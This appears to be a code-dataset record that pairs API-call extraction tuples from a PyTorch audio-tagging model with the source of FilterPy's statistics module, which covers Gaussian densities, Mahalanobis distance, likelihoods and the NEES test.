"torch.nn.init.xavier_uniform_",
"torch.mean",
"torch.nn.functional.avg_pool2d",
"numpy.exp",
"t... | [((9567, 9604), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['layer.weight'], {}), '(layer.weight)\n', (9590, 9604), True, 'import torch.nn as nn\n'), ((11300, 11341), 'torch.cat', 'torch.cat', (['(framewise_output, pad)'], {'dim': '(1)'}), '((framewise_output, pad), dim=1)\n', (11309, 11341), False, 'import torch\n'), ((911, 940), 'numpy.exp', 'np.exp', (['(-2 * np.pi * 1.0j / n)'], {}), '(-2 * np.pi * 1.0j / n)\n', (917, 940), True, 'import numpy as np\n'), ((951, 973), 'numpy.power', 'np.power', (['omega', '(x * y)'], {}), '(omega, x * y)\n', (959, 973), True, 'import numpy as np\n'), ((1095, 1123), 'numpy.exp', 'np.exp', (['(2 * np.pi * 1.0j / n)'], {}), '(2 * np.pi * 1.0j / n)\n', (1101, 1123), True, 'import numpy as np\n'), ((1134, 1156), 'numpy.power', 'np.power', (['omega', '(x * y)'], {}), '(omega, x * y)\n', (1142, 1156), True, 'import numpy as np\n'), ((1977, 2037), 'librosa.filters.get_window', 'librosa.filters.get_window', (['window', 'win_length'], {'fftbins': '(True)'}), '(window, win_length, fftbins=True)\n', (2003, 2037), False, 'import librosa\n'), ((2103, 2145), 'librosa.util.pad_center', 'librosa.util.pad_center', (['fft_window', 'n_fft'], {}), '(fft_window, n_fft)\n', (2126, 2145), False, 'import librosa\n'), ((2280, 2418), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': '(1)', 'out_channels': 'out_channels', 'kernel_size': 'n_fft', 'stride': 'hop_length', 'padding': '(0)', 'dilation': '(1)', 'groups': '(1)', 'bias': '(False)'}), '(in_channels=1, out_channels=out_channels, kernel_size=n_fft,\n stride=hop_length, padding=0, dilation=1, groups=1, bias=False)\n', (2289, 2418), True, 'import torch.nn as nn\n'), ((2548, 2686), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': '(1)', 'out_channels': 'out_channels', 'kernel_size': 'n_fft', 'stride': 'hop_length', 'padding': '(0)', 'dilation': '(1)', 'groups': '(1)', 'bias': '(False)'}), '(in_channels=1, out_channels=out_channels, kernel_size=n_fft,\n stride=hop_length, padding=0, dilation=1, groups=1, bias=False)\n', (2557, 2686), True, 'import torch.nn as nn\n'), ((6330, 6360), 'torch.matmul', 'torch.matmul', (['input', 'self.melW'], {}), '(input, self.melW)\n', (6342, 6360), False, 'import torch\n'), ((11549, 11678), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'in_channels', 'out_channels': 'out_channels', 'kernel_size': '(3, 3)', 'stride': '(1, 1)', 'padding': '(1, 1)', 'bias': '(False)'}), '(in_channels=in_channels, out_channels=out_channels, kernel_size=(\n 3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n', (11558, 11678), True, 'import torch.nn as nn\n'), ((11779, 11909), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'out_channels', 'out_channels': 'out_channels', 'kernel_size': '(3, 3)', 'stride': '(1, 1)', 'padding': '(1, 1)', 'bias': '(False)'}), '(in_channels=out_channels, out_channels=out_channels, kernel_size=\n (3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n', (11788, 11909), True, 'import torch.nn as nn\n'), ((12008, 12036), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (12022, 12036), True, 'import torch.nn as nn\n'), ((12056, 12084), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (12070, 12084), True, 'import torch.nn as nn\n'), ((13125, 13237), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': 'in_features', 'out_channels': 'out_features', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channels=in_features, out_channels=out_features, kernel_size=1,\n stride=1, padding=0, bias=True)\n', (13134, 13237), True, 'import torch.nn as nn\n'), ((13336, 13448), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': 'in_features', 'out_channels': 'out_features', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channels=in_features, out_channels=out_features, kernel_size=1,\n stride=1, padding=0, bias=True)\n', (13345, 13448), True, 'import torch.nn as nn\n'), ((13551, 13579), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (13565, 13579), True, 'import torch.nn as nn\n'), ((13930, 13962), 'torch.sum', 'torch.sum', (['(norm_att * cla)'], {'dim': '(2)'}), '(norm_att * cla, dim=2)\n', (13939, 13962), False, 'import torch\n'), ((15512, 15536), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['mel_bins'], {}), '(mel_bins)\n', (15526, 15536), True, 'import torch.nn as nn\n'), ((15989, 16021), 'torch.nn.Linear', 'nn.Linear', (['(2048)', '(2048)'], {'bias': '(True)'}), '(2048, 2048, bias=True)\n', (15998, 16021), True, 'import torch.nn as nn\n'), ((16328, 16371), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16337, 16371), True, 'import torch.nn.functional as F\n'), ((16451, 16494), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16460, 16494), True, 'import torch.nn.functional as F\n'), ((16574, 16617), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16583, 16617), True, 'import torch.nn.functional as F\n'), ((16697, 16740), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16706, 16740), True, 'import torch.nn.functional as F\n'), ((16820, 16863), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16829, 16863), True, 'import torch.nn.functional as F\n'), ((16943, 16986), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16952, 16986), True, 'import torch.nn.functional as F\n'), ((17929, 17949), 'torch.mean', 'torch.mean', (['x'], {'dim': '(3)'}), '(x, dim=3)\n', (17939, 17949), False, 'import torch\n'), ((17964, 18015), 'torch.nn.functional.max_pool1d', 'F.max_pool1d', (['x'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(x, kernel_size=3, stride=1, padding=1)\n', (17976, 18015), True, 'import torch.nn.functional as F\n'), ((18029, 18080), 'torch.nn.functional.avg_pool1d', 'F.avg_pool1d', (['x'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(x, kernel_size=3, stride=1, padding=1)\n', (18041, 18080), True, 'import torch.nn.functional as F\n'), ((18114, 18157), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.5)', 'training': 'self.training'}), '(x, p=0.5, training=self.training)\n', (18123, 18157), True, 'import torch.nn.functional as F\n'), ((18263, 18306), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.5)', 'training': 'self.training'}), '(x, p=0.5, training=self.training)\n', (18272, 18306), True, 'import torch.nn.functional as F\n'), ((20015, 20032), 'numpy.load', 'np.load', (['wav_path'], {}), '(wav_path)\n', (20022, 20032), True, 'import numpy as np\n'), ((20992, 21004), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (21002, 21004), True, 'import torch.nn as nn\n'), ((22297, 22338), 'sklearn.metrics.f1_score', 'f1_score', (['y_true', 'y_pred'], {'average': '"""macro"""'}), "(y_true, y_pred, average='macro')\n", (22305, 22338), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((22588, 22629), 'sklearn.metrics.f1_score', 'f1_score', (['y_true', 'y_pred'], {'average': '"""macro"""'}), "(y_true, y_pred, average='macro')\n", (22596, 22629), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((23768, 23828), 'sklearn.metrics.average_precision_score', 'average_precision_score', (['targ', 'clipwise_output'], {'average': 'None'}), '(targ, clipwise_output, average=None)\n', (23791, 23828), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((23983, 24022), 'numpy.concatenate', 'np.concatenate', (['self.prediction'], {'axis': '(0)'}), '(self.prediction, axis=0)\n', (23997, 24022), True, 'import numpy as np\n'), ((24040, 24075), 'numpy.concatenate', 'np.concatenate', (['self.target'], {'axis': '(0)'}), '(self.target, axis=0)\n', (24054, 24075), True, 'import numpy as np\n'), ((24092, 24145), 'sklearn.metrics.average_precision_score', 'average_precision_score', (['y_true', 'y_pred'], {'average': 'None'}), '(y_true, y_pred, average=None)\n', (24115, 24145), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((24636, 24660), 'torch.load', 'torch.load', (['weights_path'], {}), '(weights_path)\n', (24646, 24660), False, 'import torch\n'), ((24738, 24751), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (24749, 24751), False, 'from collections import OrderedDict\n'), ((867, 879), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (876, 879), True, 'import numpy as np\n'), ((881, 893), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (890, 893), True, 'import numpy as np\n'), ((1051, 1063), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (1060, 1063), True, 'import numpy as np\n'), ((1065, 1077), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (1074, 1077), True, 'import numpy as np\n'), ((3606, 3674), 'torch.nn.functional.pad', 'F.pad', (['x'], {'pad': '(self.n_fft // 2, self.n_fft // 2)', 'mode': 'self.pad_mode'}), '(x, pad=(self.n_fft // 2, self.n_fft // 2), mode=self.pad_mode)\n', (3611, 3674), True, 'import torch.nn.functional as F\n'), ((5813, 5889), 'librosa.filters.mel', 'librosa.filters.mel', ([], {'sr': 'sr', 'n_fft': 'n_fft', 'n_mels': 'n_mels', 'fmin': 'fmin', 'fmax': 'fmax'}), '(sr=sr, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax)\n', (5832, 5889), False, 'import librosa\n'), ((5985, 6008), 'torch.Tensor', 'torch.Tensor', (['self.melW'], {}), '(self.melW)\n', (5997, 6008), False, 'import torch\n'), ((12477, 12515), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12489, 12515), True, 'import torch.nn.functional as F\n'), ((21115, 21134), 'torch.isnan', 'torch.isnan', (['input_'], {}), '(input_)\n', (21126, 21134), False, 'import torch\n'), ((21136, 21160), 'torch.zeros_like', 'torch.zeros_like', (['input_'], {}), '(input_)\n', (21152, 21160), False, 'import torch\n'), ((21199, 21218), 'torch.isinf', 'torch.isinf', (['input_'], {}), '(input_)\n', (21210, 21218), False, 'import torch\n'), ((21220, 21244), 'torch.zeros_like', 'torch.zeros_like', (['input_'], {}), '(input_)\n', (21236, 21244), False, 'import torch\n'), ((6762, 6807), 'torch.clamp', 'torch.clamp', (['input'], {'min': 'self.amin', 'max': 'np.inf'}), '(input, min=self.amin, max=np.inf)\n', (6773, 6807), False, 'import torch\n'), ((6845, 6877), 'numpy.maximum', 'np.maximum', (['self.amin', 'ref_value'], {}), '(self.amin, ref_value)\n', (6855, 6877), True, 'import numpy as np\n'), ((8270, 8323), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': 'self.drop_width', 'size': '(1,)'}), '(low=0, high=self.drop_width, size=(1,))\n', (8283, 8323), False, 'import torch\n'), ((8345, 8405), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': '(total_width - distance)', 'size': '(1,)'}), '(low=0, high=total_width - distance, size=(1,))\n', (8358, 8405), False, 'import torch\n'), ((12565, 12603), 'torch.nn.functional.avg_pool2d', 'F.avg_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12577, 12603), True, 'import torch.nn.functional as F\n'), ((14157, 14173), 'torch.sigmoid', 'torch.sigmoid', (['x'], {}), '(x)\n', (14170, 14173), False, 'import torch\n'), ((20283, 20324), 'numpy.zeros', 'np.zeros', (['effective_length'], {'dtype': 'y.dtype'}), '(effective_length, dtype=y.dtype)\n', (20291, 20324), True, 'import numpy as np\n'), ((20349, 20392), 'numpy.random.randint', 'np.random.randint', (['(effective_length - len_y)'], {}), '(effective_length - len_y)\n', (20366, 20392), True, 'import numpy as np\n'), ((22449, 22488), 'numpy.concatenate', 'np.concatenate', (['self.prediction'], {'axis': '(0)'}), '(self.prediction, axis=0)\n', (22463, 22488), True, 'import numpy as np\n'), ((22521, 22556), 'numpy.concatenate', 'np.concatenate', (['self.target'], {'axis': '(0)'}), '(self.target, axis=0)\n', (22535, 22556), True, 'import numpy as np\n'), ((23845, 23865), 'numpy.nan_to_num', 'np.nan_to_num', (['score'], {}), '(score)\n', (23858, 23865), True, 'import numpy as np\n'), ((24162, 24182), 'numpy.nan_to_num', 'np.nan_to_num', (['score'], {}), '(score)\n', (24175, 24182), True, 'import numpy as np\n'), ((2854, 2910), 'numpy.real', 'np.real', (['(self.W[:, 0:out_channels] * fft_window[:, None])'], {}), '(self.W[:, 0:out_channels] * fft_window[:, None])\n', (2861, 2910), True, 'import numpy as np\n'), ((3036, 3092), 'numpy.imag', 'np.imag', (['(self.W[:, 0:out_channels] * fft_window[:, None])'], {}), '(self.W[:, 0:out_channels] * fft_window[:, None])\n', (3043, 3092), True, 'import numpy as np\n'), ((12658, 12696), 'torch.nn.functional.avg_pool2d', 'F.avg_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12670, 12696), True, 'import torch.nn.functional as F\n'), ((12714, 12752), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12726, 12752), True, 'import torch.nn.functional as F\n'), ((20554, 20597), 'numpy.random.randint', 'np.random.randint', (['(len_y - effective_length)'], {}), '(len_y - effective_length)\n', (20571, 20597), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name, too-many-arguments, bad-whitespace
# pylint: disable=too-many-lines, too-many-locals, len-as-condition
# pylint: disable=import-outside-toplevel
"""Copyright 2015 <NAME>.
FilterPy library.
http://github.com/rlabbe/filterpy
Documentation at:
https://filterpy.readthedocs.org
Supporting book at:
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the readme.MD file
for more information.
"""
from __future__ import absolute_import, division, unicode_literals
import math
from math import cos, sin
import random
import warnings
import numpy as np
from numpy.linalg import inv
import scipy.linalg as linalg
import scipy.sparse as sp
import scipy.sparse.linalg as spln
from scipy.stats import norm, multivariate_normal
# Older versions of scipy do not support the allow_singular keyword. I could
# check the version number explicily, but perhaps this is clearer
_support_singular = True
try:
multivariate_normal.logpdf(1, 1, 1, allow_singular=True)
except TypeError:
warnings.warn(
'You are using a version of SciPy that does not support the '\
'allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). '\
'Future versions of FilterPy will require a version of SciPy that '\
'implements this keyword',
DeprecationWarning)
_support_singular = False
def _validate_vector(u, dtype=None):
# this is taken from scipy.spatial.distance. Internal function, so
# redefining here.
u = np.asarray(u, dtype=dtype).squeeze()
# Ensure values such as u=1 and u=[1] still return 1-D arrays.
u = np.atleast_1d(u)
if u.ndim > 1:
raise ValueError("Input vector should be 1-D.")
return u
def mahalanobis(x, mean, cov):
"""
Computes the Mahalanobis distance between the state vector x from the
Gaussian `mean` with covariance `cov`. This can be thought as the number
of standard deviations x is from the mean, i.e. a return value of 3 means
x is 3 std from mean.
Parameters
----------
x : (N,) array_like, or float
Input state vector
mean : (N,) array_like, or float
mean of multivariate Gaussian
cov : (N, N) array_like or float
covariance of the multivariate Gaussian
Returns
-------
mahalanobis : double
The Mahalanobis distance between vectors `x` and `mean`
Examples
--------
>>> mahalanobis(x=3., mean=3.5, cov=4.**2) # univariate case
0.125
>>> mahalanobis(x=3., mean=6, cov=1) # univariate, 3 std away
3.0
>>> mahalanobis([1., 2], [1.1, 3.5], [[1., .1],[.1, 13]])
0.42533327058913922
"""
x = _validate_vector(x)
mean = _validate_vector(mean)
if x.shape != mean.shape:
raise ValueError("length of input vectors must be the same")
y = x - mean
S = np.atleast_2d(cov)
dist = float(np.dot(np.dot(y.T, inv(S)), y))
return math.sqrt(dist)
def log_likelihood(z, x, P, H, R):
"""
Returns log-likelihood of the measurement z given the Gaussian
posterior (x, P) using measurement function H and measurement
covariance error R
"""
S = np.dot(H, np.dot(P, H.T)) + R
return logpdf(z, np.dot(H, x), S)
def likelihood(z, x, P, H, R):
"""
Returns likelihood of the measurement z given the Gaussian
posterior (x, P) using measurement function H and measurement
covariance error R
"""
return np.exp(log_likelihood(z, x, P, H, R))
def logpdf(x, mean=None, cov=1, allow_singular=True):
"""
Computes the log of the probability density function of the normal
N(mean, cov) for the data x. The normal may be univariate or multivariate.
Wrapper for older versions of scipy.multivariate_normal.logpdf which
don't support support the allow_singular keyword prior to verion 0.15.0.
If it is not supported, and cov is singular or not PSD you may get
an exception.
`x` and `mean` may be column vectors, row vectors, or lists.
"""
if mean is not None:
flat_mean = np.asarray(mean).flatten()
else:
flat_mean = None
flat_x = np.asarray(x).flatten()
if _support_singular:
return multivariate_normal.logpdf(flat_x, flat_mean, cov, allow_singular)
return multivariate_normal.logpdf(flat_x, flat_mean, cov)
def gaussian(x, mean, var, normed=True):
"""
returns probability density function (pdf) for x given a Gaussian with the
specified mean and variance. All must be scalars.
gaussian (1,2,3) is equivalent to scipy.stats.norm(2, math.sqrt(3)).pdf(1)
It is quite a bit faster albeit much less flexible than the latter.
Parameters
----------
x : scalar or array-like
The value(s) for which we compute the distribution
mean : scalar
Mean of the Gaussian
var : scalar
Variance of the Gaussian
normed : bool, default True
Normalize the output if the input is an array of values.
Returns
-------
pdf : float
probability distribution of x for the Gaussian (mean, var). E.g. 0.101 denotes
10.1%.
Examples
--------
>>> gaussian(8, 1, 2)
1.3498566943461957e-06
>>> gaussian([8, 7, 9], 1, 2)
array([1.34985669e-06, 3.48132630e-05, 3.17455867e-08])
"""
pdf = ((2*math.pi*var)**-.5) * np.exp((-0.5*(np.asarray(x)-mean)**2.) / var)
if normed and len(np.shape(pdf)) > 0:
pdf = pdf / sum(pdf)
return pdf
def mul(mean1, var1, mean2, var2):
"""
Multiply Gaussian (mean1, var1) with (mean2, var2) and return the
results as a tuple (mean, var).
Strictly speaking the product of two Gaussian PDFs is a Gaussian
function, not Gaussian PDF. It is, however, proportional to a Gaussian
PDF, so it is safe to treat the output as a PDF for any filter using
Bayes equation, which normalizes the result anyway.
Parameters
----------
mean1 : scalar
mean of first Gaussian
var1 : scalar
variance of first Gaussian
mean2 : scalar
mean of second Gaussian
var2 : scalar
variance of second Gaussian
Returns
-------
mean : scalar
mean of product
var : scalar
variance of product
Examples
--------
>>> mul(1, 2, 3, 4)
(1.6666666666666667, 1.3333333333333333)
References
----------
Bromily. "Products and Convolutions of Gaussian Probability Functions",
Tina Memo No. 2003-003.
http://www.tina-vision.net/docs/memos/2003-003.pdf
"""
mean = (var1*mean2 + var2*mean1) / (var1 + var2)
var = 1 / (1/var1 + 1/var2)
return (mean, var)
def mul_pdf(mean1, var1, mean2, var2):
"""
Multiply Gaussian (mean1, var1) with (mean2, var2) and return the
results as a tuple (mean, var, scale_factor).
Strictly speaking the product of two Gaussian PDFs is a Gaussian
function, not Gaussian PDF. It is, however, proportional to a Gaussian
PDF. `scale_factor` provides this proportionality constant
Parameters
----------
mean1 : scalar
mean of first Gaussian
var1 : scalar
variance of first Gaussian
mean2 : scalar
mean of second Gaussian
var2 : scalar
variance of second Gaussian
Returns
-------
mean : scalar
mean of product
var : scalar
variance of product
scale_factor : scalar
proportionality constant
Examples
--------
>>> mul(1, 2, 3, 4)
(1.6666666666666667, 1.3333333333333333)
References
----------
Bromily. "Products and Convolutions of Gaussian Probability Functions",
Tina Memo No. 2003-003.
http://www.tina-vision.net/docs/memos/2003-003.pdf
"""
mean = (var1*mean2 + var2*mean1) / (var1 + var2)
var = 1. / (1./var1 + 1./var2)
S = math.exp(-(mean1 - mean2)**2 / (2*(var1 + var2))) / \
math.sqrt(2 * math.pi * (var1 + var2))
return mean, var, S
def add(mean1, var1, mean2, var2):
"""
Add the Gaussians (mean1, var1) with (mean2, var2) and return the
results as a tuple (mean,var).
var1 and var2 are variances - sigma squared in the usual parlance.
"""
return (mean1+mean2, var1+var2)
def multivariate_gaussian(x, mu, cov):
"""
This is designed to replace scipy.stats.multivariate_normal
which is not available before version 0.14. You may either pass in a
multivariate set of data:
.. code-block:: Python
multivariate_gaussian (array([1,1]), array([3,4]), eye(2)*1.4)
multivariate_gaussian (array([1,1,1]), array([3,4,5]), 1.4)
or unidimensional data:
.. code-block:: Python
multivariate_gaussian(1, 3, 1.4)
In the multivariate case if cov is a scalar it is interpreted as eye(n)*cov
The function gaussian() implements the 1D (univariate)case, and is much
faster than this function.
equivalent calls:
.. code-block:: Python
multivariate_gaussian(1, 2, 3)
scipy.stats.multivariate_normal(2,3).pdf(1)
Parameters
----------
x : float, or np.array-like
Value to compute the probability for. May be a scalar if univariate,
or any type that can be converted to an np.array (list, tuple, etc).
np.array is best for speed.
mu : float, or np.array-like
mean for the Gaussian . May be a scalar if univariate, or any type
that can be converted to an np.array (list, tuple, etc).np.array is
best for speed.
cov : float, or np.array-like
Covariance for the Gaussian . May be a scalar if univariate, or any
type that can be converted to an np.array (list, tuple, etc).np.array is
best for speed.
Returns
-------
probability : float
probability for x for the Gaussian (mu,cov)
"""
warnings.warn(
("This was implemented before SciPy version 0.14, which implemented "
"scipy.stats.multivariate_normal. This function will be removed in "
"a future release of FilterPy"), DeprecationWarning)
# force all to numpy.array type, and flatten in case they are vectors
x = np.array(x, copy=False, ndmin=1).flatten()
mu = np.array(mu, copy=False, ndmin=1).flatten()
nx = len(mu)
cov = _to_cov(cov, nx)
norm_coeff = nx*math.log(2*math.pi) + np.linalg.slogdet(cov)[1]
err = x - mu
if sp.issparse(cov):
numerator = spln.spsolve(cov, err).T.dot(err)
else:
numerator = np.linalg.solve(cov, err).T.dot(err)
return math.exp(-0.5*(norm_coeff + numerator))
def multivariate_multiply(m1, c1, m2, c2):
"""
Multiplies the two multivariate Gaussians together and returns the
results as the tuple (mean, covariance).
Examples
--------
.. code-block:: Python
m, c = multivariate_multiply([7.0, 2], [[1.0, 2.0], [2.0, 1.0]],
[3.2, 0], [[8.0, 1.1], [1.1,8.0]])
Parameters
----------
m1 : array-like
Mean of first Gaussian. Must be convertable to an 1D array via
numpy.asarray(), For example 6, [6], [6, 5], np.array([3, 4, 5, 6])
are all valid.
c1 : matrix-like
Covariance of first Gaussian. Must be convertable to an 2D array via
numpy.asarray().
m2 : array-like
Mean of second Gaussian. Must be convertable to an 1D array via
numpy.asarray(), For example 6, [6], [6, 5], np.array([3, 4, 5, 6])
are all valid.
c2 : matrix-like
Covariance of second Gaussian. Must be convertable to an 2D array via
numpy.asarray().
Returns
-------
m : ndarray
mean of the result
c : ndarray
covariance of the result
"""
C1 = np.asarray(c1)
C2 = np.asarray(c2)
M1 = np.asarray(m1)
M2 = np.asarray(m2)
sum_inv = np.linalg.inv(C1+C2)
C3 = np.dot(C1, sum_inv).dot(C2)
M3 = (np.dot(C2, sum_inv).dot(M1) +
np.dot(C1, sum_inv).dot(M2))
return M3, C3
def covariance_ellipse(P, deviations=1):
"""
Returns a tuple defining the ellipse representing the 2 dimensional
covariance matrix P.
Parameters
----------
P : nd.array shape (2,2)
covariance matrix
deviations : int (optional, default = 1)
# of standard deviations. Default is 1.
Returns (angle_radians, width_radius, height_radius)
"""
U, s, _ = linalg.svd(P)
orientation = math.atan2(U[1, 0], U[0, 0])
width = deviations * math.sqrt(s[0])
height = deviations * math.sqrt(s[1])
if height > width:
raise ValueError('width must be greater than height')
return (orientation, width, height)
def _eigsorted(cov, asc=True):
"""
Computes eigenvalues and eigenvectors of a covariance matrix and returns
them sorted by eigenvalue.
Parameters
----------
cov : ndarray
covariance matrix
asc : bool, default=True
determines whether we are sorted smallest to largest (asc=True),
or largest to smallest (asc=False)
Returns
-------
eigval : 1D ndarray
eigenvalues of covariance ordered largest to smallest
eigvec : 2D ndarray
eigenvectors of covariance matrix ordered to match `eigval` ordering.
I.e eigvec[:, 0] is the rotation vector for eigval[0]
"""
eigval, eigvec = np.linalg.eigh(cov)
order = eigval.argsort()
if not asc:
# sort largest to smallest
order = order[::-1]
return eigval[order], eigvec[:, order]
def _std_tuple_of(var=None, std=None, interval=None):
"""
Convienence function for plotting. Given one of var, standard
deviation, or interval, return the std. Any of the three can be an
iterable list.
Examples
--------
>>>_std_tuple_of(var=[1, 3, 9])
(1, 2, 3)
"""
if std is not None:
if np.isscalar(std):
std = (std,)
return std
if interval is not None:
if np.isscalar(interval):
interval = (interval,)
return norm.interval(interval)[1]
if var is None:
raise ValueError("no inputs were provided")
if np.isscalar(var):
var = (var,)
return np.sqrt(var)
def norm_cdf(x_range, mu, var=1, std=None):
"""
Computes the probability that a Gaussian distribution lies
within a range of values.
Parameters
----------
x_range : (float, float)
tuple of range to compute probability for
mu : float
mean of the Gaussian
var : float, optional
variance of the Gaussian. Ignored if `std` is provided
std : float, optional
standard deviation of the Gaussian. This overrides the `var` parameter
Returns
-------
probability : float
probability that Gaussian is within x_range. E.g. .1 means 10%.
"""
if std is None:
std = math.sqrt(var)
return abs(norm.cdf(x_range[0], loc=mu, scale=std) -
norm.cdf(x_range[1], loc=mu, scale=std))
def _to_cov(x, n):
"""
If x is a scalar, returns a covariance matrix generated from it
as the identity matrix multiplied by x. The dimension will be nxn.
If x is already a 2D numpy array then it is returned unchanged.
Raises ValueError if not positive definite
"""
if np.isscalar(x):
if x < 0:
raise ValueError('covariance must be > 0')
return np.eye(n) * x
x = np.atleast_2d(x)
try:
# quickly find out if we are positive definite
np.linalg.cholesky(x)
except:
raise ValueError('covariance must be positive definit')
return x
def rand_student_t(df, mu=0, std=1):
"""
return random number distributed by student's t distribution with
`df` degrees of freedom with the specified mean and standard deviation.
"""
x = random.gauss(0, std)
y = 2.0*random.gammavariate(0.5 * df, 2.0)
return x / (math.sqrt(y / df)) + mu
def NEES(xs, est_xs, ps):
"""
Computes the normalized estimated error squared (NEES) test on a sequence
of estimates. The estimates are optimal if the mean error is zero and
the covariance matches the Kalman filter's covariance. If this holds,
then the mean of the NEES should be equal to or less than the dimension
of x.
Examples
--------
.. code-block: Python
xs = ground_truth()
est_xs, ps, _, _ = kf.batch_filter(zs)
NEES(xs, est_xs, ps)
Parameters
----------
xs : list-like
sequence of true values for the state x
est_xs : list-like
sequence of estimates from an estimator (such as Kalman filter)
ps : list-like
sequence of covariance matrices from the estimator
Returns
-------
errs : list of floats
list of NEES computed for each estimate
"""
est_err = xs - est_xs
errs = []
for x, p in zip(est_err, ps):
errs.append(np.dot(x.T, linalg.inv(p)).dot(x))
return errs
| [
"numpy.sqrt",
"math.sqrt",
"math.log",
"numpy.array",
"math.exp",
"scipy.stats.norm.cdf",
"numpy.atleast_2d",
"numpy.isscalar",
"random.gammavariate",
"numpy.asarray",
"scipy.stats.norm.interval",
"numpy.dot",
"numpy.linalg.eigh",
"warnings.warn",
"scipy.sparse.linalg.spsolve",
"numpy.... | [((1014, 1070), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['(1)', '(1)', '(1)'], {'allow_singular': '(True)'}), '(1, 1, 1, allow_singular=True)\n', (1040, 1070), False, 'from scipy.stats import norm, multivariate_normal\n'), ((1685, 1701), 'numpy.atleast_1d', 'np.atleast_1d', (['u'], {}), '(u)\n', (1698, 1701), True, 'import numpy as np\n'), ((2916, 2934), 'numpy.atleast_2d', 'np.atleast_2d', (['cov'], {}), '(cov)\n', (2929, 2934), True, 'import numpy as np\n'), ((2996, 3011), 'math.sqrt', 'math.sqrt', (['dist'], {}), '(dist)\n', (3005, 3011), False, 'import math\n'), ((4342, 4392), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['flat_x', 'flat_mean', 'cov'], {}), '(flat_x, flat_mean, cov)\n', (4368, 4392), False, 'from scipy.stats import norm, multivariate_normal\n'), ((9920, 10127), 'warnings.warn', 'warnings.warn', (['"""This was implemented before SciPy version 0.14, which implemented scipy.stats.multivariate_normal. This function will be removed in a future release of FilterPy"""', 'DeprecationWarning'], {}), "(\n 'This was implemented before SciPy version 0.14, which implemented scipy.stats.multivariate_normal. This function will be removed in a future release of FilterPy'\n , DeprecationWarning)\n", (9933, 10127), False, 'import warnings\n'), ((10472, 10488), 'scipy.sparse.issparse', 'sp.issparse', (['cov'], {}), '(cov)\n', (10483, 10488), True, 'import scipy.sparse as sp\n'), ((10623, 10664), 'math.exp', 'math.exp', (['(-0.5 * (norm_coeff + numerator))'], {}), '(-0.5 * (norm_coeff + numerator))\n', (10631, 10664), False, 'import math\n'), ((11834, 11848), 'numpy.asarray', 'np.asarray', (['c1'], {}), '(c1)\n', (11844, 11848), True, 'import numpy as np\n'), ((11858, 11872), 'numpy.asarray', 'np.asarray', (['c2'], {}), '(c2)\n', (11868, 11872), True, 'import numpy as np\n'), ((11882, 11896), 'numpy.asarray', 'np.asarray', (['m1'], {}), '(m1)\n', (11892, 11896), True, 'import numpy as np\n'), ((11906, 11920), 'numpy.asarray', 'np.asarray', (['m2'], {}), '(m2)\n', (11916, 11920), True, 'import numpy as np\n'), 